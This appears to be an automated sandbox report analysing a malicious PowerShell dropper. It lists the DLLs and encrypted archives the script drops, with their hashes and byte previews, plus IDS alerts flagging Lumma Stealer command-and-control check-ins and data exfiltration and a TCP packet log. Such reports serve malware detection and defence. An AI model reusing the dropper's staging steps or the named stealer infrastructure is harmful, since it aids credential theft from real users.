SSDEEP:	98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
MD5:	11C8962675B6D535C018A63BE0821E4C
SHA1:	A150FA871E10919A1D626FFE37B1A400142F452B
SHA-256:	421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
SHA-512:	3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2/m.vN..vN..vN......wN..m..pN..m..zN...6..wN..m..cN...6..aN..vN...J..m..xN..m..$N..m..wN..m..wN..RichvN..................PE..L......e.................(....Z......Y.......@....@..........................0c.......c...@..................................b_.h.....`.8.............b.. ....b.X...PT..............................x.^.@............@..l............................text...r&.......(.................. ..`.rdata....W..@....W..,..............@..@.data...xM...0`.."....`.............@....rsrc...8.....`......<`.............@..@.reloc........b.......a.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\VWPGdipf\StarBurn.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	669792
Entropy (8bit):	6.967035663118671
Encrypted:	false
SSDEEP:	12288:1/gzbnbASodCXNn5FJX5KrN9VmoBBDFDn8j:FRSoSn5FJX5KZ9VmoDKj
MD5:	F75225DB13E3B86477DC8658C63F9B99
SHA1:	6FFD5596FD69E161B788001ABAB195CC609476CF
SHA-256:	4286CF3C1ED10B8D6E2794AB4ED1CFCDED0EA40D6794016CE926CD9B547C6A00
SHA-512:	07DEE210DE39E9F303BB72558C4B2AEB5DE597638F0A5BFDCBE8F8BADFB46A45F7A1518726D543F18682214668D22586299159E2C3947A9285990867BC457327
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d...................."..`........B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l\|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\VWPGdipf\UpdateClient.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	65856
Entropy (8bit):	6.253138341040912
Encrypted:	false
SSDEEP:	1536:DyvHa8En7WFlzobIrmKD8owRaggg5TIcO3YDmj7Hx4:DyvHa8EnKFqKD8aK0jj6
MD5:	760F24F0150A6E8DC15AC793C3172387
SHA1:	920D5AAFB4B460EFC37B99564BD281E63C7EB647
SHA-256:	E113F8593244C1BB5BCC73FEF0F93303C783714162CBD9EF93DDFF5709C037CE
SHA-512:	E5251075164F9CDB154B0B5BF7B775C9720B0744D004B68CE6501A980342F45398505BC26F7CCA982BD23A03609B3C78510A5778A93041E7614E17B369A7209F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. .......................@.......p....@.................................t...J.......................@'... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......l....`..............`...........................................V. 0u..}........(......"..(.......6..(....(.......0..;.......s......s.......(.......,..o......o........,..o.......(.........................#).......0..;.......s......s.......(.......,..o......o........,..o.......(.........................#).......0..;.......s......s.......o.......,..o......o........,..o.......(.........................#).......0..B.......s......s.......o......o.......,..o......o...

C:\Users\user\AppData\Roaming\VWPGdipf\UpdateCommon.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	146752
Entropy (8bit):	6.209702529084155
Encrypted:	false
SSDEEP:	3072:8zWwFkpFMOKq9hC3ZWU+Oq1hZ+fVztxQ0rzc0to734o:s/zq9huqrZ+dbQIz1o
MD5:	985F25C1D3144F37F046BC8F3E2B0C83
SHA1:	C0B551C51317891D8220AB5A634C15ACF8223E88
SHA-256:	3F71FA4C64376E85486B22DE926F61C3E3CDE3DE6C1D484E041F265534CCD623
SHA-512:	B0DB2C878948922243CC80AB015A954B11C5E08FCE7DBE767722BC5082B150F277690ACF9DA1C657837E7A66059CAFA7BA76C3695BBA51B44467979F5A9C053B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................-... ...@....@.. ..............................g"....@..................................-..J....@..................@'...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H........................................................................0..E........(......(......(......~....%-.&~..........s....%.....(...+(...+(.......z..~.....?(....(....o....(......0...........(......~.....l(....(....o....(....(......~.....}(....(....o....(....(.....(....( ...,..~.... ....(....(.....~.... ....(....(....o!.....s"...(.....,5.o#....+..o$.....(.....s....o%....o&...-....,..o'.............$.........{...."..}.........{...."..}....*.....(....~....%-.&~...

C:\Users\user\AppData\Roaming\VWPGdipf\isjii

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Atari 68xxx CPX file (version 4d53)
Category:	dropped
Size (bytes):	15400
Entropy (8bit):	5.921776181449881
Encrypted:	false
SSDEEP:	192:/O3hRJxZvLMOOXgLaQPCDSupU5dwbADeQ6QirDde8QjbcRIo70xdF3yRLZ1XrRbP:gh5dLMOOUVu6gSeDWXo70d3yTJRb+K
MD5:	744424FBBAC9BBA03E53DEA3587E327E
SHA1:	B1CD89346897AA9A0787336B44E638E231B3CC15
SHA-256:	E34C2C400FC112E079D825580F536EE43D5951F4DCA0C2C6C9C521CA609F09A5
SHA-512:	7C2291B8E813EFD2C55D4D55620C435205848FCB3E0D7F8DC3153AFA7D6B4BCA7BBF80BB3F3732F850F80ADD87D8165DEEB3B94BC735A70E18509E276627E812
Malicious:	false
Preview:	.do.....MS...dYIL.Ws....eFR..Dja......[uau..G..C...L.Z.j..Hh....R.._wy.Y..k.pH....sF..G.gO._.G_...DTg..[Q.C...Dg.MK.........NWRLDZQ..wagV...EyP.R.g.Ui..Q.j......vS.p.....l..q..IRr.c...R......q....YAh...aCH..A..s.v...[.mrgRfqX.w.JR...y.....pY.X.s.HuyH..q......^v.N.V\_j.x.k.....X`fRo....sC.Cl....^MaMu..G.i..v].g......jIpS.........`kIv.t..^.a.^dNU....W.M..o...Z.S.Sc.C.c.i.b...UC.I[hIV.BCsLm...jKJ.....y..fcb.EpM..V....u..U.n..`g...c.b..E..r...OGt.Lm..sn.t.YRB..\nSB..vH.w..r.V...w.Sq.Fu...bX.W.....cl....q....GI...s..K.[..H.XX.X`.x`a.I......T..d[..w.R..Nn.Oe.v.u.....d....kVZ..\nX.i.t.v_foubdB...cgeOA.....\Wi.Za.UL.....A...fr.a.CJ.BPCI.x.v...J.n.MI._.[.Y.[Wd...G.C.Wi.cVK..d.lA..p...DH.R.X...u.g.P.[......V...rOhI.g.Ej.M^..x.h......iK.Q.rC..xQj.Rr]D]O..J..fE.YwCMX....me.Sr..c..iD.s...eEt.GnAZL....T.pqlCF.u.TVp[...r.H..].b...kYMo.U.GN...C..mRD...tbPgE.B........l.I..]HA.Xu....Yy..w.mKI.mK.M.....Ra..^ATWdq.....QOu._.ILk.....b...\cbU..a.ENV..eO.QnAVv.....r...o.h.w.Swr..J....beH.^Wl..YFK...Ukqaba...

C:\Users\user\AppData\Roaming\VWPGdipf\looelll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	798054
Entropy (8bit):	7.892501542250156
Encrypted:	false
SSDEEP:	12288:TwzX9HIvQxLWZ+Q6znQ1VK5eTlVUQgEiG9UzV+RhmwhvpYmgDH/3:ghIvSWZ+RStN5B9MV+RhmeizP
MD5:	150E5E57AE9177A2CD6E587DF2D3B0EA
SHA1:	88C981FB86B2624165CD1FAB41F2C7CCEB57151F
SHA-256:	1C11168B529642BA3139672E4DD6BE5B1CAB7A206F220554155AF997427D3DA8
SHA-512:	361C1596782BB064169F8BA622838EE945CB83CA422FF3277EEBF574AC3E6257B7470A6705E0E4DA2E996971EC04A849BBB45F8D86181A4DB74B782A47814107
Malicious:	false
Preview:	_B\MW.k............L.Ej\...p....c..kC..jZf.`rtk..T.gZ...s.Ktio.Lb.SZl...BDdm..vw.....ur..CcE.K..Kv.QXjP....vJ.LB.M..vasa..cYq..m..p.Rv...SRAp.]..l.^....PqY.`mt.W.dHKl.a.d.iX...ns.O.aHa......GJX......_`n..\Q..vW..H.a..fonSOSi.`Eh.Gm..]IH.t.J..MtMhf..W.O....h...r.j..y..x.._.g.b.S...P\..^.....w.........b.nFh..SA..i.VS\B.P.K.tn..U.I.[..`Fl.b..W......`...N....v.Ve...A.......Y.e.].xK...C.S..US......cqW.I.Z`ptM.B.....GOngM.VVabAxP..c..O.HC...^.G.nWl..........rp._.nAM.I.h..r...fut....r.xq..xCW....fWS]Y.Fs..p.B..VxHXyMH..Gub._Yt.CVa.\.OJaw.c^A..._Z.h....m..u.t.c]y.r.P._B....JRvGo.KJOl.xO.I..[....nL.c.r.MN....TkF._d.b.IIsjo..gB.D...s.NkS..oRBULqcY`bs.BIy.aW...K..to.WF..Lu...M.G..r.q..j...qETj.Kw.AyRg^_^Qc.G..S.JH.......f.x.v..Umb.Ll..N...cUtCwMi...P.P.....S.K.BQ^yILl.h._.l..x..B..Y.Q....jx^eNt..u..Gp.GI.S^G....i..P...W..r.......\.yaq^Up..imka.\.Nv.AaJdyC`cPA...D.V.Ov.o..t.f.pI.x`d.R..a.lS.\.p.UhDN....VXlEFcjMy...Ap..X...G.L^.B._W.Fxs]BK..^c..d......JIn]]C.]UwEC.VkF.TT...gBg...t..h..pv.....p`A.AD

C:\Users\user\AppData\Roaming\VWPGdipf\msvcp100.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	421200
Entropy (8bit):	6.59808962341698
Encrypted:	false
SSDEEP:	12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
MD5:	03E9314004F504A14A61C3D364B62F66
SHA1:	0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
SHA-256:	A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
SHA-512:	2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\VWPGdipf\msvcr100.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	770384
Entropy (8bit):	6.908020029901359
Encrypted:	false
SSDEEP:	12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
MD5:	67EC459E42D3081DD8FD34356F7CAFC1
SHA1:	1738050616169D5B17B5ADAC3FF0370B8C642734
SHA-256:	1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
SHA-512:	9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..\|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...\|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\jcysbXpH.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	23383250
Entropy (8bit):	7.998153646469816
Encrypted:	true
SSDEEP:	393216:ApfxCtjvxsixXiISDyrnzSKRfCcO2GJak83clI7ub4e1TgEg96a+njJpzwcjI1Pt:AhxKjvJQR8zdRfCcHI83T7ubr1T6wJp0
MD5:	9745CEE6349AC275E7E375F0462BA48A
SHA1:	DB8E2A5822E9123F3108FBAF4EF18E41914C2929
SHA-256:	6632F3322CB604D2613241185163EBA61776618247A9D247A41A8EFE6762B4B0
SHA-512:	87FD6EE881166D5DCF15069D2D9AD49FD1EEA9952A1D270CC2DBB33DECFEE6E1CC0F9BCD9C2D7B171BDB35840ADEAAE1F31D913DC2E5BBB13213FA9F8F8CFAE7
Malicious:	false
Preview:	PK.........(wYf9).%.....'.....QtCore4.dll.Z}x.E..N:.3.LG..%.......x.8.%,.'jO...v..&8.\|9sfO`..sGS.............Cw&.L..!.f..aU.....d.}..{2.D.n.'...............H6!...h...D......G..)..O^..;u'W.wj.{.]..a...Y.c..5..w[.{W[.YmYx.b.}kV.=g.8.5.........$.W.YI.QH[..Yr..3J"..._]r...K...?K>...K...La..%.,..K/gi.=w.B...".HH..Cj.......c9.!...b.ge...@...[.0......!..p.KU......P].1!.&.X..Tr]#O.{o..W.....`....Gd._w.E?v.s.O2..x.n.@.......5.o!..9.W.....6.}o...-..-...H..om1!3!..8.......w.....Lr!}x..t....]...E......!..........-..8....,.,Z~.v.e..........sf2..y.j...G.....\.[x.,>!.UNer..........#M.!.......V.yh:..&`..B..t.>..W9...y./.T..M.}....-...]}63_'.X.7qst.......L.7.O..H..}.YKO+'.h t.=.......F.OR.....C..q.v\|.../...c..p.7.%.$....M1....1..C.`......@.A..5 V.~.AS/k.a...oH...R...3....0/E..fj.0R.w@...4.yp.a..[{.I.......)......_f.?../s.b.D.4..."....5......""L;..".X*iP.4..#K...".>..Bj....t.i........Hi._&...."...W.H.F.e......9...C.%.:..d..Q.._f...o'...0B!...m+5st...=

Static File Info

General

File type:	ASCII text, with very long lines (65265), with CRLF line terminators
Entropy (8bit):	5.998971392852043
TrID:
File name:	IaslcsMo.txt.ps1
File size:	31'179'107 bytes
MD5:	d7c9613ed12144aea20bee90fd5057e5
SHA1:	268f3d77e4b82f68c842a4c01f96a6ba864c09fb
SHA256:	aa22e017141e1c5974e00c72f2de158072cf9279cfedff86ac1734c6947a19e8
SHA512:	e4a89e623561f5b8434cabb5aaa2cef9d15bdff3f791029dbae8d017c8027928efec9371300b55ad5edde394673ba9c2a0ccac56f7996f69324010f55c30f77b
SSDEEP:	49152:TUfvkgL6E9gTSTWi6fMJyDHol83vPi037qiLya6YWBJacr69CKwmxJUEqw2cl3+2:1
TLSH:	946733305E9A3DBE476C8329707F6F1D1FB01F96888CB4DB439475C712AAB80992786D
File Content Preview:	.. $cNbGytXJ = "Stop".. Set-Location $Env:AppData.. $avOQhqfd = "$Env:AppData\VWPGdipf".. if (Test-Path $avOQhqfd) {.. if (Test-Path "$Env:AppData\RYJmNlDd.txt") {.. Remove-Item "$Env:AppData\RYJmNlDd.txt".. }..

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-24T10:15:42.721946+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	172.67.129.193	443	TCP
2024-11-24T10:15:43.407555+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49736	172.67.129.193	443	TCP
2024-11-24T10:15:43.407555+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49736	172.67.129.193	443	TCP
2024-11-24T10:15:45.024490+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	172.67.129.193	443	TCP
2024-11-24T10:15:45.896140+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49737	172.67.129.193	443	TCP
2024-11-24T10:15:45.896140+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49737	172.67.129.193	443	TCP
2024-11-24T10:15:47.799420+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	172.67.129.193	443	TCP
2024-11-24T10:15:48.813349+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49738	172.67.129.193	443	TCP
2024-11-24T10:15:50.526551+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	172.67.129.193	443	TCP
2024-11-24T10:15:53.127200+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	172.67.129.193	443	TCP
2024-11-24T10:15:56.001194+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	172.67.129.193	443	TCP
2024-11-24T10:15:58.459760+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	172.67.129.193	443	TCP
2024-11-24T10:16:01.604187+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	172.67.129.193	443	TCP
2024-11-24T10:16:02.601435+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49743	172.67.129.193	443	TCP
2024-11-24T10:16:04.303857+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49746	172.67.75.40	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2024 10:15:41.453774929 CET	49736	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:41.453867912 CET	443	49736	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:41.453950882 CET	49736	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:41.457031965 CET	49736	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:41.457062006 CET	443	49736	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:42.721873999 CET	443	49736	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:42.721946001 CET	49736	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:42.737795115 CET	49736	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:42.737847090 CET	443	49736	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:42.738140106 CET	443	49736	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:42.787022114 CET	49736	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:42.832703114 CET	49736	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:42.832704067 CET	49736	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:42.832902908 CET	443	49736	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:43.407561064 CET	443	49736	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:43.407658100 CET	443	49736	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:43.407743931 CET	49736	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:43.410320997 CET	49736	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:43.410365105 CET	443	49736	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:43.760562897 CET	49737	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:43.760629892 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:43.760700941 CET	49737	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:43.761111021 CET	49737	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:43.761132956 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:45.024252892 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:45.024490118 CET	49737	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:45.183548927 CET	49737	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:45.183588982 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:45.183897972 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:45.187222958 CET	49737	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:45.190373898 CET	49737	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:45.190402031 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:45.896152973 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:45.896202087 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:45.896231890 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:45.896259069 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:45.896274090 CET	49737	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:45.896306038 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:45.896317959 CET	49737	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:45.904807091 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:45.904879093 CET	49737	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:45.904886007 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:45.913127899 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:45.913167953 CET	49737	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:45.913176060 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:45.921596050 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:45.921647072 CET	49737	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:45.921653986 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:45.974513054 CET	49737	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:46.015727997 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:46.083894968 CET	49737	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:46.097043991 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:46.097305059 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:46.097354889 CET	49737	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:46.104777098 CET	49737	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:46.104777098 CET	49737	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:46.104799986 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:46.104808092 CET	443	49737	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:46.532928944 CET	49738	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:46.532983065 CET	443	49738	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:46.533584118 CET	49738	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:46.536402941 CET	49738	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:46.536422968 CET	443	49738	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:47.799268007 CET	443	49738	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:47.799420118 CET	49738	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:47.948771954 CET	49738	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:47.948807955 CET	443	49738	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:47.949142933 CET	443	49738	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:47.950620890 CET	49738	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:47.950874090 CET	49738	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:47.950901031 CET	443	49738	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:47.950965881 CET	49738	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:47.950973988 CET	443	49738	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:48.813405037 CET	443	49738	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:48.813559055 CET	443	49738	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:48.813744068 CET	49738	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:48.817089081 CET	49738	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:48.817126989 CET	443	49738	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:49.260185003 CET	49739	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:49.260219097 CET	443	49739	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:49.260288954 CET	49739	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:49.260737896 CET	49739	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:49.260752916 CET	443	49739	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:50.526454926 CET	443	49739	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:50.526551008 CET	49739	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:50.666565895 CET	49739	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:50.666603088 CET	443	49739	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:50.666949034 CET	443	49739	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:50.672411919 CET	49739	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:50.672502995 CET	49739	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:50.672523975 CET	443	49739	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:51.427457094 CET	443	49739	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:51.427736044 CET	443	49739	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:51.427805901 CET	49739	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:51.436223984 CET	49739	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:51.436265945 CET	443	49739	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:51.898745060 CET	49740	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:51.898839951 CET	443	49740	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:51.898943901 CET	49740	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:51.899358988 CET	49740	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:51.899394989 CET	443	49740	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:53.126979113 CET	443	49740	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:53.127199888 CET	49740	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:53.218117952 CET	49740	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:53.218198061 CET	443	49740	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:53.218580961 CET	443	49740	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:53.220248938 CET	49740	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:53.220385075 CET	49740	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:53.220446110 CET	443	49740	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:53.220510006 CET	49740	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:53.220544100 CET	443	49740	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:54.059715986 CET	443	49740	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:54.059797049 CET	443	49740	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:54.059930086 CET	49740	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:54.059995890 CET	49740	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:54.728178024 CET	49741	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:54.728230000 CET	443	49741	172.67.129.193	192.168.2.4
Nov 24, 2024 10:15:54.728430033 CET	49741	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:54.728858948 CET	49741	443	192.168.2.4	172.67.129.193
Nov 24, 2024 10:15:54.728873014 CET	443	49741	172.67.129.193	192.168.2.4
